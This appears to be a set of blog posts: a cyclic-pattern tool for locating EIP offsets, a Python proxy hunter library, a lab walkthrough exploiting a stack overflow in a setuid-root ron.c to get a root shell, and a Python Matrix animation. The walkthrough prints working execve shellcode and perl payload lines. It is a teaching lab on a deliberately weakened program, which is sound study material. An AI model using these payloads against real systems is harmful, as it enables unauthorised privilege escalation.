buff += "6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2E"
buff += "o3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9"
buff += "Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er"
buff += "6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2E"
buff += "t3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9"
buff += "Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew"
buff += "6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2E"
buff += "y3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9"
buff += "Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb"
buff += "6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F"
buff += "d3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9"
buff += "Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg"
buff += "6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2F"
buff += "i3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9"
buff += "Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl"
buff += "6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2F"
buff += "n3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9"
buff += "Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq"
buff += "6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2F"
buff += "s3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9"
buff += "Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv"
buff += "6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2F"
buff += "x3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9"
buff += "Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga"
buff += "6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2G"
buff += "c3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9"
buff += "Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf"
buff += "6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2G"
buff += "h3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9"
buff += "Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

Output has been saved in StackFlowers.log

gunslinger@c0debreaker:/media/disk/stackflowers$

Then we feed the pattern to a program that is vulnerable to a stack overflow, with a debugger attached, and look at what has overwritten the EIP register.
I use Immunity Debugger in this case.

The debugger shows that EIP contains 0x356b4234. Since x86 is little-endian, that is the byte sequence 34 42 6b 35 in memory, i.e. the ASCII string “4Bk5”. Now we look up exactly where “4Bk5” sits in the pattern.

Now we know the layout: 1094 bytes of the pattern are consumed before the return address, and the next 4 bytes are the ones that overwrite EIP.

That is just one example of using the program; try it yourself, and read the program's source — the project is here: https://sourceforge.net/projects/stackflowers/files/ . In future I will write about Win32 exploit development here, but in Indonesian, so stay tuned.

All right, take it easy.


PyProxy | Proxy Hunter and Tester, A high-level cross-protocol proxy-hunter python library


The idea came from some research I was doing with sockets, for which I needed proxies.
So I set out to write something that parses proxies from any site and can also check whether they work.
I also needed to import and use it dynamically from that research code, so it had to be object-oriented as well.

This article introduces a Python library I wrote,
named PyProxy.
PyProxy is a proxy hunter and tester — a high-level, cross-protocol proxy-hunting Python library.
It can be used directly from the command line, or imported into your own program.

For direct use, just execute the library. Adding -h or --help as the first argument prints the help for the module:

PyProxy v.09 by Gunslinger_ <yudha.gunslinger@gmail.com> - Proxy Hunter and Tester Opensource engine
A high-level cross-protocol proxy-hunter

Usage: pyproxy.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --samair          just use samair.ru to hunt proxies
  -l, --sitelist        use all site in the list
  -t, --test            test all proxy !
  -a, --all             do all !
  -v, --version         print current proxy hunter version
  -d, --debug           debug program for more talkable & every proxy will be
                        print to screen
  -o FILE, --outputfile=FILE
                        output proxy will be print
                        [default : proxylist.txt]
  -i FILE, --inputfile=FILE
                        input proxy will be checked
                        [default : proxylist.txt]
  -g FILE, --outputgood=FILE
                        output all good proxy will be saved
                        [default : goodproxy.txt]
  -c NUMBER, --timeout=NUMBER
                        timeout connections being program run
                        [default : 30]

  Example :
    pyproxy.py -s                   | Gather proxy with samair.ru
    pyproxy.py -l                   | Gather proxy in the url list
    pyproxy.py -t proxylist.txt     | Test proxy inside proxylist.txt
    pyproxy.py -a                   | Do all
    pyproxy.py -v                   | Print current version

For advanced users and Python programmers,
it can also be used from the Python shell by importing it:

gunslinger@c0debreaker:~/python/lib$ python
Python 2.6.2 (release26-maint, Apr 19 2009, 01:56:41) 
[GCC 4.3.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pyproxy
>>> help(pyproxy)
Help on module pyproxy:

NAME
    pyproxy

FILE
    /home/gunslinger/python/module/pyproxy/pyproxy.py

DESCRIPTION
    # -*- coding: utf-8 -*-
    #   This library is free software; you can redistribute it and/or
    #   modify it under the terms of the GNU Lesser General Public
    #   License as published by the Free Software Foundation; either
    #   version 2.1 of the License, or (at your option) any later version.
    #
    #   This library is distributed in the hope that it will be useful,
    #   but WITHOUT ANY WARRANTY; without even the implied warranty of
    #   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
    #   Lesser General Public License for more details.
    #
    #   You should have received a copy of the GNU Lesser General Public
    #   License along with this library; if not, write to the 
    #      Free Software Foundation, Inc., 
    #      59 Temple Place, Suite 330, 
    #      Boston, MA  02111-1307  USA
    #
    #   Copyright 2010 Gunslinger_ <yudha.gunslinger@gmail.com>
    #   http://bit.ly/c0debreaker

CLASSES
    __builtin__.object
        proxyhunter
        runengine
    
    class proxyhunter(__builtin__.object)
     |  Instance variables:
     |   
     |  Outputproxy
     |          Output file every proxy will be printed in
     |          Default : proxylist.txt
     |  
     |  Goodproxy
     |          Output file all good proxy will be print
     |          Default : goodproxylist.txt
     |  
     |  Verbose
     |          More noise, every proxy will be print into screen
     |          Default : True
     |  Timeout
     |          Timeout every test proxy connections in socket
     |          Default : 30
     |  
     |  Sitelist
     |          Proxy site for parsing proxy
     |          Default : []
     |  
     |  Methods defined here:
     |  
     |  Cleanitup(self, sorted_output='uniqueproxylist.txt')
     |      proxy will be printed in uniqueproxylist.txt by default
     |  
     |  CoreFreshTester(self, proxy)
     |  
     |  LoadProxy(self)
     |  
     |  MainFreshTester(self, proxy)
     |  
     |  ParseProxy(self, site)
     |  
     |  Samairdotru(self)
     |  
     |  Single(self)
     |  
     |  TestProxy(self)
     |  
     |  __init__(self, OutputProxy='proxylist.txt', GoodProxy='goodproxylist.txt', Verbose=True, TimeOut=30, Sitelist=[])
     |  
     |  ----------------------------------------------------------------------
     |  Data descriptors defined here:
     |  
     |  __dict__
     |      dictionary for instance variables (if defined)
     |  
     |  __weakref__
     |      list of weak references to the object (if defined)
    
    class runengine(__builtin__.object)
     |  Methods defined here:
     |  
     |  __init__(self)
     |  
     |  parseoption(self)
     |  
     |  printversion(self)
     |  
     |  run(self)
     |  
     |  ----------------------------------------------------------------------
     |  Data descriptors defined here:
     |  
     |  __dict__
     |      dictionary for instance variables (if defined)
     |  
     |  __weakref__
     |      list of weak references to the object (if defined)

FUNCTIONS
    main()

DATA
    __author__ = 'Gunslinger_ <yudha.gunslinger@gmail.com>'
    __copyright__ = 'Copyright (c) 2010 Gunslinger_'
    __date__ = 'Thu Oct  7 00:00:41 2010'
    __version__ = '09'
    __warningregistry__ = {('the sets module is deprecated', <type 'except...

VERSION
    09

DATE
    Thu Oct  7 00:00:41 2010

AUTHOR
    Gunslinger_ <yudha.gunslinger@gmail.com>

(END) q

Need to parse proxies from a site? It is as simple as this:

>>> ph = pyproxy.proxyhunter()
>>> ph.ParseProxy("http://aliveproxy.com/high-anonymity-proxy-list/")
[*] Parse proxy from aliveproxy.com/high-anonymity-proxy-list/
218.182.134.23:8080
210.158.6.201:8080
174.142.24.201:3128
217.23.137.56:80
174.142.104.57:3128
205.213.195.70:8080
174.142.24.203:3128
174.142.24.205:3128
24.155.96.93:0080
174.142.24.204:3128
[*] 10 Proxies receieved from : aliveproxy.com/high-anonymity-proxy-list/ 

The module can be used for proxy testing too. A caveat on what “Good” means: it only says the test request was relayed (below, the response headers came back through 174.142.24.201), not that the proxy is trustworthy. An open proxy found on a public list can read and alter everything sent through it, so send only throwaway test traffic through these hosts — never credentials or session cookies.

>>> import pyproxy
>>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt")
>>> ph.LoadProxy()
[*] File successfully loaded...
>>> ph.TestProxy()
Error : <urlopen error [Errno 111] Connection refused>
[*] 218.182.134.23:8080 
 '--------------> Bad
Error : <urlopen error [Errno 111] Connection refused>
[*] 210.158.6.201:8080 
 '--------------> Bad
Date: Fri, 08 Oct 2010 12:56:21 GMT
Server: gws
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-XSS-Protection: 1; mode=block
Set-Cookie: PREF=ID=3b034e546cd351bf:TM=1286542581:LM=1286542581:S=EmivqSAOZBhj22iF; expires=Sun, 07-Oct-2012 12:56:21 GMT; path=/; domain=.google.ca
Set-Cookie: NID=39=AQ2UnSEV0xbVMzzwrlcIhBN6dBszmQNIrHgh_iggOQh2JB8pBqz8bIrsxWQv-YX_6jaB3HlMJ7U1ghKURQyUM5evLmenr8vy9ByPZcVM-rkOGsf6nMNxxLQST1SkyJZK; expires=Sat, 09-Apr-2011 12:56:21 GMT; path=/; domain=.google.ca; HttpOnly
Connection: close
Transfer-Encoding: chunked

...
[*] 174.142.24.201:3128 
 '--------------> Good
[*] All Fresh proxy has been saved in goodproxylist.txt
>>> 

Don't need all that noise? Set the Verbose variable to False:

>>> ph = pyproxy.proxyhunter(GoodProxy="goodproxylist.txt", Verbose=False)
>>> ph.LoadProxy()
[*] File successfully loaded...
>>> ph.TestProxy()
[*] 218.182.134.23:8080 
 '--------------> Good
[*] 210.158.6.201:8080 
 '--------------> Good
[*] 174.142.24.201:3128 
 '--------------> Good
[*] 217.23.137.56:80 
 '--------------> Good
[*] 174.142.104.57:3128 
 '--------------> Good
[*] 205.213.195.70:8080 
 '--------------> Bad
[*] 174.142.24.203:3128 
 '--------------> Good
[*] 174.142.24.205:3128 
 '--------------> Good
[*] 24.155.96.93:0080 
 '--------------> Bad
[*] 174.142.24.204:3128 
 '--------------> Good
[*] All Fresh proxy has been saved in goodproxylist.txt
>>> 

For more information, take a look at the source;
the project is at https://sourceforge.net/projects/pyproxy/
I hope it is useful to you ;)


play with ron.c


I found this source on the internet.
The exploitation technique in the original write-up is the old style and no longer works as-is, so I took it as a challenge.
Let's play with ron.c. Note that the session below deliberately removes the usual protections to make the classic technique work: the binary is compiled with -fno-stack-protector, ASLR is checked to be off (randomize_va_space = 0), and the program is made setuid root (chown root; chmod 4755) to simulate a privileged target. Do this only on a throwaway lab machine, never on a system you care about.

gunslinger@localhost:~/bof$ vim ron.c
gunslinger@localhost:~/bof$ cat ron.c
 /**
    * Name: StackVuln.c
    * Author: Ron Bowes
    * Date: March 24, 2004
    * To compile: gcc StackVuln.c -o StackVuln
    * Requires: n/a
    *
    * Purpose: This code is vulnerable to a stack overflow if more than
    * 20 characters are entered. The exploit for it was written by
    * Jon Erickson in Hacking: Art of exploitation, but I wrote
    * this vulnerable code independently.
    */
    #include <stdio.h>
    #include <string.h>
    /* Entry point: copies argv[1] into a fixed 40-byte stack buffer with no
     * length check -- the overflow this program exists to demonstrate.
     * argc is never checked either, so running it with no argument hands a
     * NULL argv[1] to strcpy and it segfaults before printing anything.
     * The header comment above says "more than 20 characters", but the
     * buffer here is 40 bytes; in the gdb session below the saved return
     * address starts being clobbered at 44 bytes and is fully controlled
     * (EIP = 0x41414141) at 48. */
    int main(int argc, char *argv[])
    {
        char string[40];
        strcpy(string, argv[1]);        /* unbounded copy: the overflow point */
        printf("The message was: %s\n", string);
        printf("Program completed normally!\n\n");
        return 0;
    }


gunslinger@localhost:~/bof$ gcc -g -fno-stack-protector -mpreferred-stack-boundary=2 -o ron ron.c
gunslinger@localhost:~/bof$ sudo chown root:root ron
[sudo] password for gunslinger: 
gunslinger@localhost:~/bof$ sudo chmod 4755 ron
gunslinger@localhost:~/bof$ ./ron
Segmentation fault
gunslinger@localhost:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@localhost:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' 			[Ok]
[*] Checking null on randomize_va_space 				[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 40 byte(s)
[!] Application got segmentation fault by giving 40 byte(s) into buffer !!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 39'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!

Segmentation fault
gunslinger@localhost:~/bof$ gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) run `perl -e 'print "A" x 400'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 400'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A" x 40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 41'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 41'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 42'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 42'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 43'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 43'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program exited normally.
(gdb) run `perl -e 'print "A" x 44'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 44'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e7b703 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 45'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 45'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7e70042 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 46'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 46'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) run `perl -e 'print "A" x 47'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 47'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run `perl -e 'print "A" x 48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 48'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x1d	29
edx            0xb7fc50d0	-1208201008
ebx            0xb7fc3ff4	-1208205324
esp            0xbffff4d0	0xbffff4d0
ebp            0x41414141	0x41414141
esi            0x8048480	134513792
edi            0x8048370	134513520
eip            0x41414141	0x41414141
eflags         0x10246	[ PF ZF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) list
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
21	        return 0;
22	    }
23	
(gdb) list 1
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list 2
1	 /**
2	    * Name: StackVuln.c
3	    * Author: Ron Bowes
4	    * Date: March 24, 2004
5	    * To compile: gcc StackVuln.c -o StackVuln
6	    * Requires: n/a
7	    *
8	    * Purpose: This code is vulnerable to a stack overflow if more than
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
19	        printf("The message was: %s\n", string);
20	        printf("Program completed normally!\n\n");
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron test to see where esp is

Breakpoint 1, main (argc=7, argv=0xbffff544) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) i r esp
esp            0xbffff488	0xbffff488
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) shell su
Password: 
root@localhost:/home/gunslinger/bof# gdb -q bof
(gdb) Quit
(gdb) quit
root@localhost:/home/gunslinger/bof# gdb -q ron
(gdb) list
9	    * 20 characters are entered. The exploit for it was written by
10	    * Jon Erickson in Hacking: Art of exploitation, but I wrote
11	    * this vulnerable code independently.
12	    */
13	    #include <stdio.h>
14	    #include <string.h>
15	    int main(int argc, char *argv[])
16	    {
17	        char string[40];
18	        strcpy(string, argv[1]);
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`

Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18	        strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
                              �Rh//shh/bin��RS��̀\���\���\���
Program completed normally!


Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
root@localhost:/home/gunslinger/bof# q
bash: q: command not found
root@localhost:/home/gunslinger/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"  > shellcode3.bin
root@localhost:/home/gunslinger/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@localhost:/home/gunslinger/bof# getenv
bash: getenv: command not found
root@localhost:/home/gunslinger/bof# ./getenv
bash: ./getenv: No such file or directory
root@localhost:/home/gunslinger/bof# ls
bbf.py  bof1    bof2.c  bof.c    bufferbruteforce.py  displant.c  easy.c  get_env    man-pages    ron             shellcode.bin  smashme2    vanish.c
bf2.py  bof1.c  bof3    brute    core                 easy2       expl    get_env.c  objdasm.vim  ron.c           shellcode.c    smashme2.c
bof     bof2    bof3.c  brute.c  displant             easy2.c     expl.c  hts        passwd.php   shellcode3.bin  smashme        smashme.c
root@localhost:/home/gunslinger/bof# ./get_env
Segmentation fault
root@localhost:/home/gunslinger/bof# ./get_env PAYLOAD
PAYLOAD is at 0xbffffe78
root@localhost:/home/gunslinger/bof# printf "%x\n"  $((0xbffffe78 + 100))
bffffedc
root@localhost:/home/gunslinger/bof# \xdc\xfe\xff\xbf
bash: xdcxfexffxbf: command not found
root@localhost:/home/gunslinger/bof# /bof2 $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
bash: /bof2: No such file or directory
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2. "\xdc\xfe\xff\xbf" x 10')
String found where operator expected at -e line 1, near "2. "\xdc\xfe\xff\xbf""
	(Missing operator before  "\xdc\xfe\xff\xbf"?)
Number found where operator expected at -e line 1, near "x 10"
	(Do you need to predeclare x?)
syntax error at -e line 1, near "2. "\xdc\xfe\xff\xbf""
Execution of -e aborted due to compilation errors.
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 3 . "\xdc\xfe\xff\xbf" x 10')
The message was: �������������������������������������������
Program completed normally!

root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 4 . "\xdc\xfe\xff\xbf" x 10')
The message was: ��������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 5 . "\xdc\xfe\xff\xbf" x 10')
The message was: ���������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 6 . "\xdc\xfe\xff\xbf" x 10')
The message was: ����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 7 . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������������
Program completed normally!

Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 8 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������������
Program completed normally!

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER
GAMEOVER
# exit
root@localhost:/home/gunslinger/bof# 

matrix.py [matrix in python]


Do you know the Matrix movie?

Here I wrote some code in Python inspired by the Matrix.
Here you go!

#!/usr/bin/python
# -*- coding: utf-8 -*-
# gunslinger_ 08 feb 2010
# this code is protected under the gpl
# get your copy at <http://www.gnu.org/licenses/>

import os, time, random, sys

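class message(str):
    """A string that scrolls down the screen at its own pace.

    Instances are plain ``str`` objects carrying animation state:
    ``speed`` (frames to wait between moves), ``x`` (column),
    ``y`` (row of the first character; starts above the screen) and
    ``skip`` (frames waited since the last move).
    """

    def __new__(cls, text, speed, width=None):
        """Create a message placed at a random column above the screen.

        Args:
            text: the string to display.
            speed: frames to wait between moves (0 moves every frame).
            width: terminal width used to pick the column. When ``None``
                it is read from a fresh ``display()``, which runs
                ``stty size``; pass it explicitly to avoid that.
        """
        self = super(message, cls).__new__(cls, text)
        self.speed = speed
        # Start entirely above row 0 so the text enters one character per move.
        self.y = -1 * len(text)
        if width is None:
            width = display().width
        # randint is inclusive, so x may equal width; display.set_vertical
        # pins such a value to the last column.
        self.x = random.randint(0, width)
        self.skip = 0
        return self

    def move(self):
        """Advance one frame: wait ``speed`` frames, then drop one row."""
        if self.speed > self.skip:
            self.skip += 1
        else:
            self.skip = 0
            self.y += 1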

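class display(list):
    """A flat character buffer the size of the terminal.

    The list holds ``height * width`` single characters in row-major
    order; ``str(d)`` joins them into one string that is written
    straight to stdout.
    """

    def __init__(self):
        """Read the terminal size from ``stty size`` and blank the buffer.

        Raises:
            ValueError: when ``stty size`` prints nothing to parse
                (for example, no controlling terminal).
        """
        # Close the pipe explicitly instead of leaking it until GC.
        with os.popen('stty size', 'r') as stty:
            self.height, self.width = [int(v) for v in stty.read().split()]
        self[:] = [' '] * (self.height * self.width)

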